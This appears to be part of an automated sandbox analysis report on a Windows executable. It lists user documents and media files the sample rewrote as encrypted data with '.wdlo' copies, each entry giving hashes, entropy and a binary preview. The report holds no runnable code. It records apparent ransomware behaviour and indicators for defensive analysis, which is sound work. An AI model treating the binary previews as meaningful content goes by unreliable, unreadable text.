...D.$.z...E.....n..fv....[z..mO.<...q..........`...Ue...%...w.iG`d....%k.8c.B.....*....w.o.^..!..i... .Y+.....2ce....v...>..VZ...V>.d..F.0.-.8......T..@.......A.t.'......:....eH8...q.PZD.:....N...:i^.U....!..6{.T$@B.h..." .D.z....9...#..x..55.b)d...,u=q!......b..`..,.MI....V.n.e./B+..l...%C...C>

C:\Users\user\Documents\VAMYDFPUND.mp3

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8506015403956955
Encrypted:	false
SSDEEP:	24:K6zW1i3eS7Jv9KzD5Dp74yyTgNAELyqNwTbunpSfVWWFbD:K6zWK7AD6Tk5rhSdWWVD
MD5:	87D15C9551CA1F805D3EF59D0C440D91
SHA1:	B136136415BC539272759F5E665E1D3B8A5834C0
SHA-256:	9031175801C80C57DC4DD914EC337606847B0810BA631BEFA6549344F6817FEA
SHA-512:	77E1F849317D247C26655ADD961483F921DBAC4A58971207F7B31227A3D52DBA760EEE89EA5F1CCD14D7732DA70C0F8EEB9396577EFA0625D38BFD28B0322C45
Malicious:	false
Reputation:	unknown
Preview:	VAMYD....;M...V.~..P...w.$.^.Z.bd#.......O4..6hf../.'.......cp..`h..[.O..#&...?.k....6.-.=....j^a.z,....X.p.>.?.{s..8...P`.%........}.4N...<.....9E..4.K...]............k.X..HL.'L.P.BH/..0.F..kJr.........N..[P%...2..+..=....>....c ,...G...\|I.93......].,.n..d..K.)+h.(].....:..[.j..f.P.Tbb....=.......1..#.x..~.D8.BA..&rZ...b...CjF..[..l...:...~.....s...j.l....b`.....!..7.%..]L...$.a.....1p._.;G.l.........j....$....."...%......W..of.x.F..9..A...S......x...:..D..d..lD..E..+.[.`...V...Q-J..^C...F!C..)G.C.t....f.,.....s......EH.(..... I8....`.'_Q....>[...E.....M.q..J....#1....jT..k].....YI.1.On.r[.....:.d.IuJ;D3(.......Q..YF..B..#.A...jB1...$...3.k>.\...=SEm.[..y....9Jb.j.....!.%F.DY6.V.....ab?.)^}.[.m.-0...he....H..+O{..F....q.n@..0...........-}.%.rw2\...<...]!{...H..g.?.gb........d2....eKM..A.gN..B;\|U...i4."h(. .Cn...uA.b.Hq..;..Uv6M.......S\z.XZ..DV4....7.=.......vSV..-H....Zoc....cJ...mE.!..^:g...w...75...\...).y.tB...N....w...K......A....k/.@.s.5

C:\Users\user\Documents\VAMYDFPUND.mp3.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8506015403956955
Encrypted:	false
SSDEEP:	24:K6zW1i3eS7Jv9KzD5Dp74yyTgNAELyqNwTbunpSfVWWFbD:K6zWK7AD6Tk5rhSdWWVD
MD5:	87D15C9551CA1F805D3EF59D0C440D91
SHA1:	B136136415BC539272759F5E665E1D3B8A5834C0
SHA-256:	9031175801C80C57DC4DD914EC337606847B0810BA631BEFA6549344F6817FEA
SHA-512:	77E1F849317D247C26655ADD961483F921DBAC4A58971207F7B31227A3D52DBA760EEE89EA5F1CCD14D7732DA70C0F8EEB9396577EFA0625D38BFD28B0322C45
Malicious:	false
Reputation:	unknown
Preview:	VAMYD....;M...V.~..P...w.$.^.Z.bd#.......O4..6hf../.'.......cp..`h..[.O..#&...?.k....6.-.=....j^a.z,....X.p.>.?.{s..8...P`.%........}.4N...<.....9E..4.K...]............k.X..HL.'L.P.BH/..0.F..kJr.........N..[P%...2..+..=....>....c ,...G...\|I.93......].,.n..d..K.)+h.(].....:..[.j..f.P.Tbb....=.......1..#.x..~.D8.BA..&rZ...b...CjF..[..l...:...~.....s...j.l....b`.....!..7.%..]L...$.a.....1p._.;G.l.........j....$....."...%......W..of.x.F..9..A...S......x...:..D..d..lD..E..+.[.`...V...Q-J..^C...F!C..)G.C.t....f.,.....s......EH.(..... I8....`.'_Q....>[...E.....M.q..J....#1....jT..k].....YI.1.On.r[.....:.d.IuJ;D3(.......Q..YF..B..#.A...jB1...$...3.k>.\...=SEm.[..y....9Jb.j.....!.%F.DY6.V.....ab?.)^}.[.m.-0...he....H..+O{..F....q.n@..0...........-}.%.rw2\...<...]!{...H..g.?.gb........d2....eKM..A.gN..B;\|U...i4."h(. .Cn...uA.b.Hq..;..Uv6M.......S\z.XZ..DV4....7.=.......vSV..-H....Zoc....cJ...mE.!..^:g...w...75...\...).y.tB...N....w...K......A....k/.@.s.5

C:\Users\user\Documents\VAMYDFPUND.pdf

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861504671135337
Encrypted:	false
SSDEEP:	24:J2x1IoY9soT2JWzej7sglr06lM9gefNxxi/9EObk7s2peiXWFbD:JyXYaoT2J5sKRKfNi/qpe8WVD
MD5:	7EB282D1A3F6B48E0A509D2DD1BE3648
SHA1:	80F038A43D84E436B1C5BE17464EB6A7BEA396C3
SHA-256:	016FCFB284DDFFC012385382B03165056FB991A4799E8DC6BEC3AFF153EB8F05
SHA-512:	094AE4CE5DF6D58D2CF7CC1027952856D1891B1884BE54BE70DA94734FD0F01A4E371327EE06B81E2AF74F7378436DB2B72C208D6FCF070A1DACA8EEC74A1A19
Malicious:	false
Reputation:	unknown
Preview:	VAMYDh.....#.H..A..H}Mh......-.1....RH.r#.......}....]JZZ.......qV<Ga...;8....../..Vx....q[.......w........\|.k.z...#..i...7.A.x/ux.%.&.......}.o.8......a..o..fIt..E+V....g0`m..A.."O~.3A!..v3.....c..@..#..w..%BK.k....'`..+^....3hC.\.6~.XTP......s_........G.n4\|.k...2`....G....{w..O.'..#.)...]s..''..I...E^.j.E..6KS....!.8.nN....\|L.u(.............4w./......8z.)."3.H...>I.<...\|>...!....q..#...'..D..B9...f.3.\|>d..%.."h..H......R.e.D....6.p)..g...sy;lVm..@.....4e.up..7._.....TCD..Q...p.+.#..Kj...t.#........a..6.l.....c.S.[i_..5.y...1...H.:Q?q......."..O.x}....p..'`...m...-.^...0.A.F.`..q g..yc.P..?N.....l].@....=gs.....3....xq.x.......T..c...<=.P.\j....?3... ;".....=...^.1.s...Vb...s..=..?..:.=....Z.~.sb..o.b\.....Y...L.w.#....6.MU.s.?u..(e?..... ,<........(.g.,P......3....q..B...AD.g...L....w...t.-..>..C.7x...ZM.t...3J...]H...MB.....Y........2...(\......1.....dy..j..H...n..G..R...X.;..`..vP.....?gJ)#...zM..B..-.c......f....D....o5.,....'.eI...f...

C:\Users\user\Documents\VAMYDFPUND.pdf.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.861504671135337
Encrypted:	false
SSDEEP:	24:J2x1IoY9soT2JWzej7sglr06lM9gefNxxi/9EObk7s2peiXWFbD:JyXYaoT2J5sKRKfNi/qpe8WVD
MD5:	7EB282D1A3F6B48E0A509D2DD1BE3648
SHA1:	80F038A43D84E436B1C5BE17464EB6A7BEA396C3
SHA-256:	016FCFB284DDFFC012385382B03165056FB991A4799E8DC6BEC3AFF153EB8F05
SHA-512:	094AE4CE5DF6D58D2CF7CC1027952856D1891B1884BE54BE70DA94734FD0F01A4E371327EE06B81E2AF74F7378436DB2B72C208D6FCF070A1DACA8EEC74A1A19
Malicious:	false
Reputation:	unknown
Preview:	VAMYDh.....#.H..A..H}Mh......-.1....RH.r#.......}....]JZZ.......qV<Ga...;8....../..Vx....q[.......w........\|.k.z...#..i...7.A.x/ux.%.&.......}.o.8......a..o..fIt..E+V....g0`m..A.."O~.3A!..v3.....c..@..#..w..%BK.k....'`..+^....3hC.\.6~.XTP......s_........G.n4\|.k...2`....G....{w..O.'..#.)...]s..''..I...E^.j.E..6KS....!.8.nN....\|L.u(.............4w./......8z.)."3.H...>I.<...\|>...!....q..#...'..D..B9...f.3.\|>d..%.."h..H......R.e.D....6.p)..g...sy;lVm..@.....4e.up..7._.....TCD..Q...p.+.#..Kj...t.#........a..6.l.....c.S.[i_..5.y...1...H.:Q?q......."..O.x}....p..'`...m...-.^...0.A.F.`..q g..yc.P..?N.....l].@....=gs.....3....xq.x.......T..c...<=.P.\j....?3... ;".....=...^.1.s...Vb...s..=..?..:.=....Z.~.sb..o.b\.....Y...L.w.#....6.MU.s.?u..(e?..... ,<........(.g.,P......3....q..B...AD.g...L....w...t.-..>..C.7x...ZM.t...3J...]H...MB.....Y........2...(\......1.....dy..j..H...n..G..R...X.;..`..vP.....?gJ)#...zM..B..-.c......f....D....o5.,....'.eI...f...

C:\Users\user\Documents\WKXEWIOTXI.jpg

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832149518949406
Encrypted:	false
SSDEEP:	24:OwQzNvHr2+HmK8bJwI+Y+qPpzUWglrrBWFbD:FQ1LnmK2xclpBWVD
MD5:	730A9B3D0EEEC58DF0B23EB6C628BF1F
SHA1:	FB100FCAD0DE5F2928BF6252D08CBCC946317514
SHA-256:	28BED888906A2E0A310645914F5367BBA998A08559259FC38D8EBE9D708721B5
SHA-512:	EF758E699A21D9512C4BD4E2115E0C68B6D6AA32B394A01007BFE326DD79F334B3E60DF79CDC974DAEE8A3B83A041E1CB4BEBC9AB82A606E6FF7C42701500B59
Malicious:	false
Reputation:	unknown
Preview:	WKXEW...a....:\|1.1...f.I..mr.H#.T\|......r.C.....T/........5...Zw...o...d\|......^c......IR...z.!S....a...Z.`38..}UT..5f...Y.i..4..\L.U...w.I\|.m........)....PA;.....A.T..".Y<.....=jP..t^.....9.T....Y0X 6z........m....T.!.Q..........Q.;.@?....p.....!6.-Z..k{.s.\|..9...k.c..FJj4.phkI.=..3j......Z...O.......~=...?r!~.f..Z..~X.?..P...Y....4....4.g..J3.A.F.m.{\..@~H\|..&.7Y.......e..o...[=.F^.....u....b..U...K.Z....6=.(...lZL]......1....c....#............HYQ.S!J..N.Ot._V.pCV..h5.bd..w.....SA..%.\|..3.....O/..~...?&...a...0.X?.~?...B.O..2X..J.u'.].....4=y.......nbJ.Z.m.....C.pi...15....yR...A...n......{.........f....{Z.I8A...%&3/..(.......~...... ...?}[p3.<........Wr6j.'...J.).Q..'..G...+.>...UIA...L\|j.at.)E....:.a.`e&.Y....{p..D?.n..!u....}..C....j....\|U...C.........^A.j.n.i.}.).].p..'...F.1...-..`..c.3n.AR..M9..A.....qH..?6...L.......A..$.=.4}..&.T.Cu?.%.`.ZxF..._.??..u....k.....A.{CkV......w....*..&q.Ido.S..\|.v..1(...a..z..ep..a.

C:\Users\user\Documents\WKXEWIOTXI.jpg.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.832149518949406
Encrypted:	false
SSDEEP:	24:OwQzNvHr2+HmK8bJwI+Y+qPpzUWglrrBWFbD:FQ1LnmK2xclpBWVD
MD5:	730A9B3D0EEEC58DF0B23EB6C628BF1F
SHA1:	FB100FCAD0DE5F2928BF6252D08CBCC946317514
SHA-256:	28BED888906A2E0A310645914F5367BBA998A08559259FC38D8EBE9D708721B5
SHA-512:	EF758E699A21D9512C4BD4E2115E0C68B6D6AA32B394A01007BFE326DD79F334B3E60DF79CDC974DAEE8A3B83A041E1CB4BEBC9AB82A606E6FF7C42701500B59
Malicious:	false
Reputation:	unknown
Preview:	WKXEW...a....:\|1.1...f.I..mr.H#.T\|......r.C.....T/........5...Zw...o...d\|......^c......IR...z.!S....a...Z.`38..}UT..5f...Y.i..4..\L.U...w.I\|.m........)....PA;.....A.T..".Y<.....=jP..t^.....9.T....Y0X 6z........m....T.!.Q..........Q.;.@?....p.....!6.-Z..k{.s.\|..9...k.c..FJj4.phkI.=..3j......Z...O.......~=...?r!~.f..Z..~X.?..P...Y....4....4.g..J3.A.F.m.{\..@~H\|..&.7Y.......e..o...[=.F^.....u....b..U...K.Z....6=.(...lZL]......1....c....#............HYQ.S!J..N.Ot._V.pCV..h5.bd..w.....SA..%.\|..3.....O/..~...?&...a...0.X?.~?...B.O..2X..J.u'.].....4=y.......nbJ.Z.m.....C.pi...15....yR...A...n......{.........f....{Z.I8A...%&3/..(.......~...... ...?}[p3.<........Wr6j.'...J.).Q..'..G...+.>...UIA...L\|j.at.)E....:.a.`e&.Y....{p..D?.n..!u....}..C....j....\|U...C.........^A.j.n.i.}.).].p..'...F.1...-..`..c.3n.AR..M9..A.....qH..?6...L.......A..$.=.4}..&.T.Cu?.%.`.ZxF..._.??..u....k.....A.{CkV......w....*..&q.Ido.S..\|.v..1(...a..z..ep..a.

C:\Users\user\Documents\WKXEWIOTXI.xlsx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863872569091509
Encrypted:	false
SSDEEP:	24:onZzHEp/Gz9YTtOmy/7e5kB70HXLgKXh5fw7ghDFS0aNDNKEZ+LEEnWFbD:onBkF0YTtq7lYHXk4BighMNDr8znWVD
MD5:	A5D0692C643DF422482A98248415ACA0
SHA1:	C5EE2E6908CAB3AE120CEDA2DCEA921BA23A972C
SHA-256:	3C5B93C115A7757CD80DDF57846B6C2C57D029D9081E475C8DB4E3120612CD19
SHA-512:	FE29510FC1C4B9B245D3EB680166D753183A70A7061055FB77FF0AB181CB92DBFE3FBA03ADA07C18DB8EB955E3AF964CD26E2DF8A0E2DEF2267FAB7F7BC09CF2
Malicious:	false
Reputation:	unknown
Preview:	WKXEWg.......(..4Ez......0.....2...?..<.Q..Mr..2...C...j.....[..q.U..Y.?...>D.j!4..,.....Z...D;l.T>Jh....=.....(......Cs2&.a...Za..j...P.3...r\|.2q.#z\|........I J..LdY4.+g+..U}i...F..i.aH#?.........\|t..i.<..p...O....G.D..s....U."...L..<.)N..S'..........].......n~b...~.J..wk.V?..A..+l.>...R.x.`.IEm...:.b.s,..+6#n...-.x..........A..#s...).G.....0L....>....9....xR+j.]<...m...}......u.{\|...m..5?.Z..\|1NA..<!....C...T.;2.G.z-.)&.S+.".GB.`.5....uH/G.c:..u..]....6./..C.{......0;....VXu'....y..Z.=.tBL.i{....x..RJ...h.A.._.hY.A.......b6..t...1. ..j....`.Qa.Cd..hO......`.U.....!.z..XA..8..D...+N..G.b.U.r.R6..P.....'w..,.Ib...&..p...,.'.EP...f....k..~$_.@~,k..}.,.H..[..s.G.6r..w...z.7]..x..G......3f.a.1M.......K..A....._Dn...M.g.......r6.p....5....i......e.A.......\|.C....wl.L....^.V...X./..g.dB..XP.#\|[..0...s..X.^...s.nq..E!.......m...j._C>..>.^J.#..E.....L.&%7.[.>.O6...`xZ.l.\T..K.Y.d..N..^...f..AP.....6O.B.O.....2...7.....w..O

C:\Users\user\Documents\WKXEWIOTXI.xlsx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863872569091509
Encrypted:	false
SSDEEP:	24:onZzHEp/Gz9YTtOmy/7e5kB70HXLgKXh5fw7ghDFS0aNDNKEZ+LEEnWFbD:onBkF0YTtq7lYHXk4BighMNDr8znWVD
MD5:	A5D0692C643DF422482A98248415ACA0
SHA1:	C5EE2E6908CAB3AE120CEDA2DCEA921BA23A972C
SHA-256:	3C5B93C115A7757CD80DDF57846B6C2C57D029D9081E475C8DB4E3120612CD19
SHA-512:	FE29510FC1C4B9B245D3EB680166D753183A70A7061055FB77FF0AB181CB92DBFE3FBA03ADA07C18DB8EB955E3AF964CD26E2DF8A0E2DEF2267FAB7F7BC09CF2
Malicious:	false
Reputation:	unknown
Preview:	WKXEWg.......(..4Ez......0.....2...?..<.Q..Mr..2...C...j.....[..q.U..Y.?...>D.j!4..,.....Z...D;l.T>Jh....=.....(......Cs2&.a...Za..j...P.3...r\|.2q.#z\|........I J..LdY4.+g+..U}i...F..i.aH#?.........\|t..i.<..p...O....G.D..s....U."...L..<.)N..S'..........].......n~b...~.J..wk.V?..A..+l.>...R.x.`.IEm...:.b.s,..+6#n...-.x..........A..#s...).G.....0L....>....9....xR+j.]<...m...}......u.{\|...m..5?.Z..\|1NA..<!....C...T.;2.G.z-.)&.S+.".GB.`.5....uH/G.c:..u..]....6./..C.{......0;....VXu'....y..Z.=.tBL.i{....x..RJ...h.A.._.hY.A.......b6..t...1. ..j....`.Qa.Cd..hO......`.U.....!.z..XA..8..D...+N..G.b.U.r.R6..P.....'w..,.Ib...&..p...,.'.EP...f....k..~$_.@~,k..}.,.H..[..s.G.6r..w...z.7]..x..G......3f.a.1M.......K..A....._Dn...M.g.......r6.p....5....i......e.A.......\|.C....wl.L....^.V...X./..g.dB..XP.#\|[..0...s..X.^...s.nq..E!.......m...j._C>..>.^J.#..E.....L.&%7.[.>.O6...`xZ.l.\T..K.Y.d..N..^...f..AP.....6O.B.O.....2...7.....w..O

C:\Users\user\Documents\ZTGJILHXQB.png

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851152932861316
Encrypted:	false
SSDEEP:	24:8B450woXmeaV1hqmjiUAOFlNdOSrCguXYOyx5k1b53AG1yf0c+OSO/xiR0zWyWFX:dmhWFLZiURrOSuIS5QCMbFSO/xFXWVD
MD5:	1918398D0D7720D9FE5820BF343D8A15
SHA1:	8FE5B2F7F25D2355AC6EEA94AE5948E3BD52E826
SHA-256:	ACB350B7A6CAB7D620D41F18B8E77568A02BBC5EABA1847C4AC724E05D5E2C97
SHA-512:	326D22F396545C80AE51B94883DC04AAE070ABFBFBE2DF9F538EBCD564B539106717A0A7739F12C4F3BF6C7AD018D8EE8A1AFDC6A5D195F7F5AF0BDDE3278F74
Malicious:	false
Reputation:	unknown
Preview:	ZTGJIj...I9....FL.z..2...{y..s.w.v_...V..].t..y...(...l\|.n./0.%_ri..>.fu...C.s.E2).!#.$.....6.){.mY..J.Z.xh....\.tW.wN_b....S]...,.....U.hT.Z...!P.@Q....d.....-F.kp.G.br.....z.{gr.....3?/...FC.......I@hv.nW\.#be.6....5h..w..$>.s...j....1.....7.....=.Ze./..0Ms.E....zG..../..g.{...Kp...`..k}..........vk5.}.._.uv<.~..J...).....T.HNZ.;...g+..8J._.R.n;x.......7..'...^@...x.w.\|.k.'...[4g.....M..Pz.C...y......8....?}./.(...2..$.mg...y.........+..OA....D7.1.tM:...>["S.o..n.a'RU......E_7.[.....k.i.....q.(,.../..2...\|......3u$4...^..LW..]?...X....h...z.....0...[.\|.?.~......d!.3S.6K5/.^.....M+;m..1.w....y{..'.X..r.;.T.@.K..G.L58.z{w.wv.q(!..'......J.a...H..b...f...c..(...u.+.,..eJ...r)../.>D9N.(..35e.3.[:_..xP......UB..'.....+..(.....X{.P&.c8.`. .....'...;.7.X...@2.@xF!..Q/.9...Y....O...Mf)C.&F.:@.k#......f...N....JV]..;.O......%..':_u..W`.l.`G.. .4..$.u..sX...Wc...N<o.?.?-.Z.@...0...,......}.C#P.. .V.....y..)......S...........$*.YbA...r...R.-..\|

C:\Users\user\Documents\ZTGJILHXQB.png.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851152932861316
Encrypted:	false
SSDEEP:	24:8B450woXmeaV1hqmjiUAOFlNdOSrCguXYOyx5k1b53AG1yf0c+OSO/xiR0zWyWFX:dmhWFLZiURrOSuIS5QCMbFSO/xFXWVD
MD5:	1918398D0D7720D9FE5820BF343D8A15
SHA1:	8FE5B2F7F25D2355AC6EEA94AE5948E3BD52E826
SHA-256:	ACB350B7A6CAB7D620D41F18B8E77568A02BBC5EABA1847C4AC724E05D5E2C97
SHA-512:	326D22F396545C80AE51B94883DC04AAE070ABFBFBE2DF9F538EBCD564B539106717A0A7739F12C4F3BF6C7AD018D8EE8A1AFDC6A5D195F7F5AF0BDDE3278F74
Malicious:	false
Reputation:	unknown
Preview:	ZTGJIj...I9....FL.z..2...{y..s.w.v_...V..].t..y...(...l\|.n./0.%_ri..>.fu...C.s.E2).!#.$.....6.){.mY..J.Z.xh....\.tW.wN_b....S]...,.....U.hT.Z...!P.@Q....d.....-F.kp.G.br.....z.{gr.....3?/...FC.......I@hv.nW\.#be.6....5h..w..$>.s...j....1.....7.....=.Ze./..0Ms.E....zG..../..g.{...Kp...`..k}..........vk5.}.._.uv<.~..J...).....T.HNZ.;...g+..8J._.R.n;x.......7..'...^@...x.w.\|.k.'...[4g.....M..Pz.C...y......8....?}./.(...2..$.mg...y.........+..OA....D7.1.tM:...>["S.o..n.a'RU......E_7.[.....k.i.....q.(,.../..2...\|......3u$4...^..LW..]?...X....h...z.....0...[.\|.?.~......d!.3S.6K5/.^.....M+;m..1.w....y{..'.X..r.;.T.@.K..G.L58.z{w.wv.q(!..'......J.a...H..b...f...c..(...u.+.,..eJ...r)../.>D9N.(..35e.3.[:_..xP......UB..'.....+..(.....X{.P&.c8.`. .....'...;.7.X...@2.@xF!..Q/.9...Y....O...Mf)C.&F.:@.k#......f...N....JV]..;.O......%..':_u..W`.l.`G.. .4..$.u..sX...Wc...N<o.?.?-.Z.@...0...,......}.C#P.. .V.....y..)......S...........$*.YbA...r...R.-..\|

C:\Users\user\Downloads\CURQNKVOIX.pdf

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839278626055275
Encrypted:	false
SSDEEP:	24:0owhvDaqFlw8VySwcD6p6FvfgeO5mzhDXVPhstu6O8JopQ74MSLzGIe6YCLBjV0o:03hdFlw8E7c2p6hfnOmzxXbx5Yom7BST
MD5:	A0A33F45054DEC1C7ECC9A5E155E869F
SHA1:	BDF35FE9876956F87D7058D7872403844D609D6A
SHA-256:	DC55EBF169AEBF5979B4FB40D05DA94644E002FADC757B6DAE4761E155E81EE9
SHA-512:	CDDBF73AC511DCE8E2EAF9C5932316539FCED241CFB9E8601C3D229685CA3742159FA6D367204A32B15DADCA9D910553CF473BD5FFBBF32E7A9D9C189AD3D799
Malicious:	false
Reputation:	unknown
Preview:	CURQN.]...e-..{.M.&.oc.P.T._.D.....K.).E.MD.S...AN...V\j.,pg<...{IQ$ua..t..[..)....A..F"..\..<.......0u`j.8).W=.4...[&.w...mn....y.%......P^.;h...Bk"wd?.#....t..@..n5w...$...t\g...N@4..3..).\|.m.%...NJ.m....l..._.....\...e.)...)<...v.+.g7-..V.......\|.qx!&..n........KV....&....7>'F...E...V....3.5Dg.g0v.....5..[....@..5B.c.\|........]....p...B.&.1..u.......)..7.3.4m....s%..P.......7...$...]7.....I.f....v....4.)L..l"\|._.b.=..8W.o..c...\|..)..i.._.-.H--k.H.0,.....#q.5.....<..J5...?.t.=..k.W.<.;.#\|...d.......m..]..WwK.8...U.w..K..aJ.....j.#..@..%..l;..wX.].p,....z<.e.m.;.......5.....{p.#..\|D.d.hn..../...+...vL....S....n.I...iV..iz(Yda.........pF.l.f.;\..x.D.dT.....\|..._P.eu..1.....C.%..<...E.P.l..D..h.(....N..3..J..C.F..t.$...........~.=..Ms.......Qz..I.&.._.Oi!m.;..j...&Dk.a^M.;Uz{>./..M.c.v.w..#B.8...(..X...6!&..'t.Bk...?..j.Dx.K...&Y}!....l..B.!.6Y.B._..31E...eT...N........%W.]...'.....g....`..[J..n..\|..[.._@.3...N&....\|c.%

C:\Users\user\Downloads\CURQNKVOIX.pdf.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839278626055275
Encrypted:	false
SSDEEP:	24:0owhvDaqFlw8VySwcD6p6FvfgeO5mzhDXVPhstu6O8JopQ74MSLzGIe6YCLBjV0o:03hdFlw8E7c2p6hfnOmzxXbx5Yom7BST
MD5:	A0A33F45054DEC1C7ECC9A5E155E869F
SHA1:	BDF35FE9876956F87D7058D7872403844D609D6A
SHA-256:	DC55EBF169AEBF5979B4FB40D05DA94644E002FADC757B6DAE4761E155E81EE9
SHA-512:	CDDBF73AC511DCE8E2EAF9C5932316539FCED241CFB9E8601C3D229685CA3742159FA6D367204A32B15DADCA9D910553CF473BD5FFBBF32E7A9D9C189AD3D799
Malicious:	false
Reputation:	unknown
Preview:	CURQN.]...e-..{.M.&.oc.P.T._.D.....K.).E.MD.S...AN...V\j.,pg<...{IQ$ua..t..[..)....A..F"..\..<.......0u`j.8).W=.4...[&.w...mn....y.%......P^.;h...Bk"wd?.#....t..@..n5w...$...t\g...N@4..3..).\|.m.%...NJ.m....l..._.....\...e.)...)<...v.+.g7-..V.......\|.qx!&..n........KV....&....7>'F...E...V....3.5Dg.g0v.....5..[....@..5B.c.\|........]....p...B.&.1..u.......)..7.3.4m....s%..P.......7...$...]7.....I.f....v....4.)L..l"\|._.b.=..8W.o..c...\|..)..i.._.-.H--k.H.0,.....#q.5.....<..J5...?.t.=..k.W.<.;.#\|...d.......m..]..WwK.8...U.w..K..aJ.....j.#..@..%..l;..wX.].p,....z<.e.m.;.......5.....{p.#..\|D.d.hn..../...+...vL....S....n.I...iV..iz(Yda.........pF.l.f.;\..x.D.dT.....\|..._P.eu..1.....C.%..<...E.P.l..D..h.(....N..3..J..C.F..t.$...........~.=..Ms.......Qz..I.&.._.Oi!m.;..j...&Dk.a^M.;Uz{>./..M.c.v.w..#B.8...(..X...6!&..'t.Bk...?..j.Dx.K...&Y}!....l..B.!.6Y.B._..31E...eT...N........%W.]...'.....g....`..[J..n..\|..[.._@.3...N&....\|c.%

C:\Users\user\Downloads\FENIVHOIKN.docx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845959481819451
Encrypted:	false
SSDEEP:	24:8et9Of9p7QPpGWUOnsg9kbeUuQ1ua7WtLDWxMsui2fBEP80OWWFbD:zt9O7QPMWBvUP1uaE3z5JEdOWWVD
MD5:	DB4185629D3526DD3F117CB3971601CC
SHA1:	5A13E4FF49B3EDF34BCABFD96E36CF4243EFCEB7
SHA-256:	CBFB1BECE8A259361F5EB50D7933E438DEC771E5C256A7C1139F375C6BA1F333
SHA-512:	099195C2852A90605C4D0FDA23C590B30979834EF3F86FA71E41EE7C6E49E04528CD683D2CB6961AC35BF78DF71E403102593D06CDD8D06378DBDD2ADCC35AC0
Malicious:	false
Reputation:	unknown
Preview:	FENIV.1]...,@y....b...U......u.B..6....vd....].nA.\|'!...i.&.T......<..P..)4g...N9._.r.-0\.s.w..........z..'.../jps.Ml...q>/.S../....!S.....!.. ....1.La.c ..}...g..R.X........D..<jQ..\|....dFL.D...i.u..[..<./.4..U..V''.9..k.c(...^.J.Eo...O.1..Hs.nfM......Z...c....qK.B...F .hf.....R.lN~..YS/Pl.DEE.......%jm.....j....I.K,F=+.....P.2P.....W<..:........k.!.b....H.8.:.._....K.]!]/V.CZ1{M9.d+....}.o.+........zk....fK..i.#oIe&"..j....aW.......l..e.r.....H.........A.yj.U.-J.....]0 .?...i[.%.........}F..f8..{..+].OJ.....3M....wL.f.1.i{o..;3...Z9T.,..d.F.5.".+.Q1"..3....7h'..]....1-wQ>qtzH.$..J%5.VI.Vk.....E....e.......{t.+.fro.......Wy....lB..z........b.....Fq.0EC.Nj..LB.:.........KqI....p.B^h.J...T..u.B..A........(/....YL....&.k9..NQK...M...g.5./q.c..D.6. .p...o...mQ...u..V...I._O././S>y....[c7......g..+.N.Lk$.O....m.S.....2P.0...\t.A.GbE.....\|Q><77.^....]...... ..R\L...&..7=2...)+.........n...G.@vc....T.Ui..C].6Q.#t'.~...!.H`..

C:\Users\user\Downloads\FENIVHOIKN.docx.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845959481819451
Encrypted:	false
SSDEEP:	24:8et9Of9p7QPpGWUOnsg9kbeUuQ1ua7WtLDWxMsui2fBEP80OWWFbD:zt9O7QPMWBvUP1uaE3z5JEdOWWVD
MD5:	DB4185629D3526DD3F117CB3971601CC
SHA1:	5A13E4FF49B3EDF34BCABFD96E36CF4243EFCEB7
SHA-256:	CBFB1BECE8A259361F5EB50D7933E438DEC771E5C256A7C1139F375C6BA1F333
SHA-512:	099195C2852A90605C4D0FDA23C590B30979834EF3F86FA71E41EE7C6E49E04528CD683D2CB6961AC35BF78DF71E403102593D06CDD8D06378DBDD2ADCC35AC0
Malicious:	false
Reputation:	unknown
Preview:	FENIV.1]...,@y....b...U......u.B..6....vd....].nA.\|'!...i.&.T......<..P..)4g...N9._.r.-0\.s.w..........z..'.../jps.Ml...q>/.S../....!S.....!.. ....1.La.c ..}...g..R.X........D..<jQ..\|....dFL.D...i.u..[..<./.4..U..V''.9..k.c(...^.J.Eo...O.1..Hs.nfM......Z...c....qK.B...F .hf.....R.lN~..YS/Pl.DEE.......%jm.....j....I.K,F=+.....P.2P.....W<..:........k.!.b....H.8.:.._....K.]!]/V.CZ1{M9.d+....}.o.+........zk....fK..i.#oIe&"..j....aW.......l..e.r.....H.........A.yj.U.-J.....]0 .?...i[.%.........}F..f8..{..+].OJ.....3M....wL.f.1.i{o..;3...Z9T.,..d.F.5.".+.Q1"..3....7h'..]....1-wQ>qtzH.$..J%5.VI.Vk.....E....e.......{t.+.fro.......Wy....lB..z........b.....Fq.0EC.Nj..LB.:.........KqI....p.B^h.J...T..u.B..A........(/....YL....&.k9..NQK...M...g.5./q.c..D.6. 